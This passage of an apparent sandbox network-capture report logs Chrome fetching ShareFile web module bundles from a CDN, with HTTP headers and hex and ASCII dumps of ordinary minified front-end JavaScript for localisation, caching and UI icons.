                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC15222INData Raw: 29 7d 29 29 2c 6e 7c 7c 28 73 5b 65 5d 3d 21 30 29 7d 29 29 2c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 2e 6c 65 6e 67 74 68 7c 7c 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 29 2e 6c 65 6e 67 74 68 29 26 26 74 68 69 73 2e 71 75 65 75 65 2e 70 75 73 68 28 7b 70 65 6e 64 69 6e 67 3a 61 2c 70 65 6e 64 69 6e 67 43 6f 75 6e 74 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 29 2e 6c 65 6e 67 74 68 2c 6c 6f 61 64 65 64 3a 7b 7d 2c 65 72 72 6f 72 73 3a 5b 5d 2c 63 61 6c 6c 62 61 63 6b 3a 6e 7d 29 2c 7b 74 6f 4c 6f 61 64 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6f 29 2c 70 65 6e 64 69 6e 67 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 61 29 2c 74 6f 4c 6f 61 64 4c 61 6e 67 75 61 67 65 73 3a 4f 62 6a 65 63 74 2e 6b 65 79 73 28 73 29 2c 74 6f 4c 6f 61 64 4e 61 6d 65 73 70 61 63
                                                                                                                                                                                                                      Data Ascii: )})),n||(s[e]=!0)})),(Object.keys(o).length||Object.keys(a).length)&&this.queue.push({pending:a,pendingCount:Object.keys(a).length,loaded:{},errors:[],callback:n}),{toLoad:Object.keys(o),pending:Object.keys(a),toLoadLanguages:Object.keys(s),toLoadNamespac
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 69 6e 64 65 78 4f 66 28 65 29 3c 30 7d 29 29 3b 72 65 74 75 72 6e 20 69 2e 6c 65 6e 67 74 68 3f 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 70 72 65 6c 6f 61 64 3d 6e 2e 63 6f 6e 63 61 74 28 69 29 2c 74 68 69 73 2e 6c 6f 61 64 52 65 73 6f 75 72 63 65 73 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 72 65 73 6f 6c 76 65 28 29 2c 74 26 26 74 28 65 29 7d 29 29 2c 72 29 3a 28 74 26 26 74 28 29 2c 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 29 29 7d 7d 2c 7b 6b 65 79 3a 22 64 69 72 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 65 7c 7c 28 65 3d 74 68 69 73 2e 72 65 73 6f 6c 76 65 64 4c 61 6e 67 75 61 67 65 7c 7c 28 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 73 26
                                                                                                                                                                                                                      Data Ascii: er((function(e){return n.indexOf(e)<0}));return i.length?(this.options.preload=n.concat(i),this.loadResources((function(e){r.resolve(),t&&t(e)})),r):(t&&t(),Promise.resolve())}},{key:"dir",value:function(e){if(e||(e=this.resolvedLanguage||(this.languages&
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 6e 20 31 7d 72 65 74 75 72 6e 20 30 7d 66 75 6e 63 74 69 6f 6e 20 52 28 65 29 7b 72 65 74 75 72 6e 20 6d 3d 76 3d 31 2c 79 3d 64 28 4f 3d 65 29 2c 62 3d 30 2c 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 41 28 65 29 7b 72 65 74 75 72 6e 20 4f 3d 22 22 2c 65 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 29 7b 72 65 74 75 72 6e 20 73 28 50 28 62 2d 31 2c 54 28 39 31 3d 3d 3d 65 3f 65 2b 32 3a 34 30 3d 3d 3d 65 3f 65 2b 31 3a 65 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4c 28 65 29 7b 66 6f 72 28 3b 28 77 3d 6a 28 29 29 26 26 77 3c 33 33 3b 29 45 28 29 3b 72 65 74 75 72 6e 20 43 28 65 29 3e 32 7c 7c 43 28 77 29 3e 33 3f 22 22 3a 22 20 22 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 2c 74 29 7b 66 6f 72 28 3b 2d 2d 74 26 26 45 28 29 26 26 21 28 77 3c 34 38 7c 7c 77 3e 31 30 32 7c 7c
                                                                                                                                                                                                                      Data Ascii: n 1}return 0}function R(e){return m=v=1,y=d(O=e),b=0,[]}function A(e){return O="",e}function N(e){return s(P(b-1,T(91===e?e+2:40===e?e+1:e)))}function L(e){for(;(w=j())&&w<33;)E();return C(e)>2||C(w)>3?"":" "}function D(e,t){for(;--t&&E()&&!(w<48||w>102||
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 74 2e 71 75 65 72 79 4b 65 79 2c 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 61 6c 6c 22 21 3d 3d 72 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 69 73 41 63 74 69 76 65 28 29 3b 69 66 28 22 61 63 74 69 76 65 22 3d 3d 3d 72 26 26 21 65 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 69 6e 61 63 74 69 76 65 22 3d 3d 3d 72 26 26 65 29 72 65 74 75 72 6e 21 31 7d 72 65 74 75 72 6e 21 28 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 73 26 26 74 2e 69 73 53 74 61 6c 65 28 29 21 3d 3d 73 7c 7c 76 6f 69 64 20 30 21 3d 3d 69 26 26 69 21 3d 3d 74 2e 73 74 61 74 65 2e 66 65 74 63 68 53 74 61 74 75 73 7c 7c 6f 26 26 21 6f 28 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 74 29 7b 63 6f 6e 73 74 7b 65 78 61 63 74 3a 72 2c 66 65 74 63 68 69 6e 67 3a 6e 2c 70 72 65 64
                                                                                                                                                                                                                      Data Ascii: t.queryKey,a))return!1;if("all"!==r){const e=t.isActive();if("active"===r&&!e)return!1;if("inactive"===r&&e)return!1}return!("boolean"==typeof s&&t.isStale()!==s||void 0!==i&&i!==t.state.fetchStatus||o&&!o(t))}function m(e,t){const{exact:r,fetching:n,pred
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC14808INData Raw: 6e 73 7d 66 69 6e 64 28 65 29 7b 72 65 74 75 72 6e 20 76 6f 69 64 20 30 3d 3d 3d 65 2e 65 78 61 63 74 26 26 28 65 2e 65 78 61 63 74 3d 21 30 29 2c 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6e 64 28 28 74 3d 3e 6d 28 65 2c 74 29 29 29 7d 66 69 6e 64 41 6c 6c 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6c 74 65 72 28 28 74 3d 3e 6d 28 65 2c 74 29 29 29 7d 6e 6f 74 69 66 79 28 65 29 7b 46 2e 62 61 74 63 68 28 28 28 29 3d 3e 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 2e 66 6f 72 45 61 63 68 28 28 74 3d 3e 7b 74 28 65 29 7d 29 29 7d 29 29 7d 72 65 73 75 6d 65 50 61 75 73 65 64 4d 75 74 61 74 69 6f 6e 73 28 29 7b 63 6f 6e 73 74 20 65 3d 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 73 2e 66 69 6c 74 65 72 28 28 65 3d
                                                                                                                                                                                                                      Data Ascii: ns}find(e){return void 0===e.exact&&(e.exact=!0),this.mutations.find((t=>m(e,t)))}findAll(e){return this.mutations.filter((t=>m(e,t)))}notify(e){F.batch((()=>{this.listeners.forEach((t=>{t(e)}))}))}resumePausedMutations(){const e=this.mutations.filter((e=
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC1576INData Raw: 75 63 63 65 73 73 29 7c 7c 74 2e 63 61 6c 6c 28 72 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 64 61 74 61 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 63 6f 6e 74 65 78 74 29 2c 6e 75 6c 6c 3d 3d 28 6e 3d 28 69 3d 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 29 2e 6f 6e 53 65 74 74 6c 65 64 29 7c 7c 6e 2e 63 61 6c 6c 28 69 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 64 61 74 61 2c 6e 75 6c 6c 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 76 61 72 69 61 62 6c 65 73 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 52 65 73 75 6c 74 2e 63 6f 6e 74 65 78 74 29 3b 65 6c 73 65 20 69 66 28 65 2e 6f 6e 45 72 72 6f 72
                                                                                                                                                                                                                      Data Ascii: uccess)||t.call(r,this.currentResult.data,this.currentResult.variables,this.currentResult.context),null==(n=(i=this.mutateOptions).onSettled)||n.call(i,this.currentResult.data,null,this.currentResult.variables,this.currentResult.context);else if(e.onError
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC16384INData Raw: 65 22 29 3b 72 65 74 75 72 6e 20 74 7d 2c 66 65 3d 69 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 21 31 29 2c 64 65 3d 28 29 3d 3e 69 2e 75 73 65 43 6f 6e 74 65 78 74 28 66 65 29 2c 68 65 3d 66 65 2e 50 72 6f 76 69 64 65 72 3b 66 75 6e 63 74 69 6f 6e 20 70 65 28 29 7b 6c 65 74 20 65 3d 21 31 3b 72 65 74 75 72 6e 7b 63 6c 65 61 72 52 65 73 65 74 3a 28 29 3d 3e 7b 65 3d 21 31 7d 2c 72 65 73 65 74 3a 28 29 3d 3e 7b 65 3d 21 30 7d 2c 69 73 52 65 73 65 74 3a 28 29 3d 3e 65 7d 7d 63 6f 6e 73 74 20 67 65 3d 69 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 28 70 65 28 29 29 2c 6d 65 3d 28 29 3d 3e 69 2e 75 73 65 43 6f 6e 74 65 78 74 28 67 65 29 3b 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f
                                                                                                                                                                                                                      Data Ascii: e");return t},fe=i.createContext(!1),de=()=>i.useContext(fe),he=fe.Provider;function pe(){let e=!1;return{clearReset:()=>{e=!1},reset:()=>{e=!0},isReset:()=>e}}const ge=i.createContext(pe()),me=()=>i.useContext(ge);function ve(e,t){return"function"==typeo


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      83192.168.2.174980313.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC574OUTGET /sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/main.css HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:15 UTC506INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: text/css
                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 08:39:37 GMT
                                                                                                                                                                                                                      Last-Modified: Tue, 22 Oct 2024 14:02:15 GMT
                                                                                                                                                                                                                      ETag: "d41d8cd98f00b204e9800998ecf8427e"
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      X-Cache: Hit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 ec5c4a66c1200ddcc562c6e98f77a48c.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: _n6uwZ99VG0rrqQbKyBHjAUwCzsBdwHgiSpUAgD4n42c14cIiR70GA==
                                                                                                                                                                                                                      Age: 39399
                                                                                                                                                                                                                      Vary: Origin


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      84192.168.2.174980413.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC604OUTGET /sharefile-web/sharefiledev-identity-pilet/1.0.24/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 28069
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Fri, 11 Oct 2024 13:52:21 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:17 GMT
                                                                                                                                                                                                                      ETag: "53988d5b050bd0e958bb6c2c66bd557f"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 5e95d2e6aebe43cabd9dcdad89ad0a42.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: bCE8YwJwzwKzF8-3GSLKYJKTqczbL0Z3KffM1NM2mek01TLmELl_cg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC16384INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 69 64 65 6e 74 69 74 79 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3d 7b 7d 2c 6e 3d 7b 7d 2c 61 3d 7b 7d 2c 6f 3d 7b 7d 3b 72 65 74 75 72 6e 7b 73 65 74 74 65 72 73 3a 5b 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 3d 65 2e 63 6f 6c 6f 72 50 61 6c 65 74 74 65 7d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 41 6c 65 72 74 3d 65 2e 41 6c 65 72 74 2c 6e 2e
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevidentitypilet,{})System.register(["@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},a={},o={};return{setters:[function(e){r.colorPalette=e.colorPalette},function(e){n.Alert=e.Alert,n.
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC11685INData Raw: 34 38 68 2d 31 2e 34 38 32 56 34 2e 35 33 6c 2d 39 2e 38 34 36 20 39 2e 38 34 37 2d 31 2e 30 34 38 2d 31 2e 30 34 38 7a 22 7d 29 2c 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 2c 64 3a 22 4d 32 20 34 2e 37 37 38 68 31 30 76 31 2e 34 38 31 48 33 2e 34 38 31 76 31 34 2e 32 36 68 31 34 2e 32 36 56 31 32 68 31 2e 34 38 31 76 31 30 48 32 7a 22 7d 29 29 7d 2c 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 70 65 2c 61 28 7b 7d 2c 65 2c 7b 63 6f 6d 70 6f 6e 65 6e 74 3a 6a 65 7d 29 29 7d 2c 6b 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 76 67 22
                                                                                                                                                                                                                      Data Ascii: 48h-1.482V4.53l-9.846 9.847-1.048-1.048z"}),n.createElement("path",{fill:"currentColor",d:"M2 4.778h10v1.481H3.481v14.26h14.26V12h1.481v10H2z"}))},ze=function(e){return n.createElement(pe,a({},e,{component:je}))},ke=function(){return n.createElement("svg"


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      85192.168.2.174980513.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC609OUTGET /sharefile-web/sharefiledev-permissions-pilet/1.118.39/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                      Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                      Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC589INHTTP/1.1 200 OK
                                                                                                                                                                                                                      Content-Type: application/x-javascript
                                                                                                                                                                                                                      Content-Length: 92489
                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                      Last-Modified: Thu, 17 Oct 2024 02:36:11 GMT
                                                                                                                                                                                                                      x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                      Server: AmazonS3
                                                                                                                                                                                                                      Date: Tue, 05 Nov 2024 19:36:17 GMT
                                                                                                                                                                                                                      ETag: "c5427afac37ff069e0cb72a8345a1c43"
                                                                                                                                                                                                                      X-Cache: RefreshHit from cloudfront
                                                                                                                                                                                                                      Via: 1.1 23776effa8a63b2e2dccd702e73b0c86.cloudfront.net (CloudFront)
                                                                                                                                                                                                                      X-Amz-Cf-Pop: AMS54-C1
                                                                                                                                                                                                                      X-Amz-Cf-Id: q5mlFk8YQ2G1GFGJ87jaAV0HdeQzIZxOrutskrZ1noM-zvX4KEqILg==
                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://averellharriman.sharefile.com
                                                                                                                                                                                                                      Vary: Origin
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC15795INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 70 65 72 6d 69 73 73 69 6f 6e 73 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 6f 3d 7b 7d 2c 69 3d 7b 7d 2c 61 3d 7b 7d 2c 73 3d 7b 7d 2c 75 3d 7b 7d 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72
                                                                                                                                                                                                                      Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevpermissionspilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router-dom","tslib"],(function(e,t){var n={},r={},o={},i={},a={},s={},u={};return Object.definePr
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 6f 70 74 69 6f 6e 73 2e 73 61 76 65 4d 69 73 73 69 6e 67 54 6f 3f 54 3d 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 55 74 69 6c 73 2e 74 6f 52 65 73 6f 6c 76 65 48 69 65 72 61 72 63 68 79 28 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3a 54 2e 70 75 73 68 28 74 2e 6c 6e 67 7c 7c 74 68 69 73 2e 6c 61 6e 67 75 61 67 65 29 3b 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 2c 72 29 7b 76 61 72 20 69 3d 4e 26 26 72 21 3d 3d 79 3f 72 3a 44 3b 6f 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 3f 6f 2e 6f 70 74 69 6f 6e 73 2e 6d 69 73 73 69 6e 67 4b 65 79 48 61 6e 64 6c 65 72 28 65 2c 66 2c 6e 2c 69 2c 49 2c 74 29 3a 6f 2e 62 61 63 6b 65 6e 64 43 6f 6e 6e 65 63 74 6f 72 26 26 6f 2e 62 61 63 6b 65 6e 64 43 6f 6e
                                                                                                                                                                                                                      Data Ascii: options.saveMissingTo?T=this.languageUtils.toResolveHierarchy(t.lng||this.language):T.push(t.lng||this.language);var V=function(e,n,r){var i=N&&r!==y?r:D;o.options.missingKeyHandler?o.options.missingKeyHandler(e,f,n,i,I,t):o.backendConnector&&o.backendCon
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 21 3d 3d 75 6e 64 65 66 69 6e 65 64 3f 72 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 3a 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 69 6e 74 65 72 70 6f 6c 61 74 69 6f 6e 2e 73 6b 69 70 4f 6e 56 61 72 69 61 62 6c 65 73 3b 72 65 74 75 72 6e 5b 7b 72 65 67 65 78 3a 74 68 69 73 2e 72 65 67 65 78 70 55 6e 65 73 63 61 70 65 2c 73 61 66 65 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 63 28 65 29 7d 7d 2c 7b 72 65 67 65 78 3a 74 68 69 73 2e 72 65 67 65 78 70 2c 73 61 66 65 56 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 73 2e 65 73 63 61 70 65 56 61 6c 75 65 3f 63 28 73 2e 65 73 63 61 70 65 28 65 29 29 3a 63 28 65 29 7d 7d 5d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e
                                                                                                                                                                                                                      Data Ascii: !==undefined?r.interpolation.skipOnVariables:this.options.interpolation.skipOnVariables;return[{regex:this.regexpUnescape,safeValue:function(e){return c(e)}},{regex:this.regexp,safeValue:function(e){return s.escapeValue?c(s.escape(e)):c(e)}}].forEach((fun
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 5b 74 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6e 3b 72 65 74 75 72 6e 28 6e 3d 65 2e 73 74 6f 72 65 29 5b 74 5d 2e 61 70 70 6c 79 28 6e 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 7d 7d 29 29 3b 76 61 72 20 6c 3d 4f 28 29 2c 66 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 72 29 7b 65 2e 69 73 49 6e 69 74 69 61 6c 69 7a 65 64 26 26 21 65 2e 69 6e 69 74 69 61 6c 69 7a 65 64 53 74 6f 72 65 4f 6e 63 65 26 26 65 2e 6c 6f 67 67 65 72 2e 77 61 72 6e 28 22 69 6e 69 74 3a 20 69 31 38 6e 65 78 74 20 69 73 20 61 6c 72 65 61 64 79 20 69 6e 69 74 69 61 6c 69 7a 65 64 2e 20 59 6f 75 20 73 68 6f 75 6c 64 20 63 61 6c 6c 20 69 6e 69 74 20 6a 75 73 74 20 6f 6e 63
                                                                                                                                                                                                                      Data Ascii: orEach((function(t){e[t]=function(){var n;return(n=e.store)[t].apply(n,arguments),e}}));var l=O(),f=function(){var t=function(t,r){e.isInitialized&&!e.initializedStoreOnce&&e.logger.warn("init: i18next is already initialized. You should call init just onc
                                                                                                                                                                                                                      2024-11-05 19:36:17 UTC16384INData Raw: 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 6e 2c 74 29 29 7d 29 29 7d 72 65 74 75 72 6e 20 65 7d 76 61 72 20 41 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 44 65 66 61 75 6c 74 3d 22 65 6e 22 2c 65 2e 45 6e 67 6c 69 73 68 3d 22 65 6e 22 2c 65 2e 47 65 72 6d 61 6e 3d 22 64 65 22 2c 65 2e 53 70 61 6e 69 73 68 3d 22 65 73 22 2c 65 2e 46 72 65 6e 63 68 3d 22 66 72 22 2c 65 2e 49 74 61 6c 69 61 6e 3d 22 69 74 22 2c 65 2e 4a 61 70 61 6e 65 73 65 3d 22 6a 61 22 2c 65 2e 44 75 74 63 68 3d 22 6e 6c 22 2c 65 2e 50 6f 72 74 75 67 75 65 73 65 42 72 61 7a 69 6c 69 61 6e 3d 22 70 74 2d 42 52 22 2c 65 2e 43 49 4d 6f 64 65 3d 22 63 69 6d 6f 64 65 22 2c 65 7d 28 7b 7d 29 2c 44 65 3d 7b 69 6e 74 65 72 70
                                                                                                                                                                                                                      Data Ascii: ect.getOwnPropertyDescriptor(n,t))}))}return e}var Ae=function(e){return e.Default="en",e.English="en",e.German="de",e.Spanish="es",e.French="fr",e.Italian="it",e.Japanese="ja",e.Dutch="nl",e.PortugueseBrazilian="pt-BR",e.CIMode="cimode",e}({}),De={interp


                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                      86192.168.2.174980613.227.219.304437144C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                      2024-11-05 19:36:16 UTC603OUTGET /sharefile-web/sharefiledev-rubicon-pilet/0.33.5/package/dist/index.js HTTP/1.1
